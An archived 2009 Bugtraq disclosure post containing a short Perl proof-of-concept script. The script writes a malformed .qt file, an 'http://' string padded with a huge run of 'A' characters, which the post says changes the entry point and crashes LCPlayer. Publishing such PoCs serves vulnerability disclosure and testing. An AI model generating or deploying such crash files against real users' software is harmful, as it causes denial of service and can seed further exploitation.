lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 4 Feb 2009 19:08:03 -0000
From: darkb0x97@...glemail.com
To: bugtraq@...urityfocus.com
Subject: LCPlayer (.qt file) EOP change PoC (app crash)

#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97@...glemail.com
#after loading the file click on it in the program
#entry point will change and the app will crash


my $file = "dark.qt" ;
my $poc="http://"."A" x 0265487 ;
open(b0x, ">>$file") or die "Cannot open $file";
print b0x $poc;
close(b0x);
print "\n[+] done ! , $file created";

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ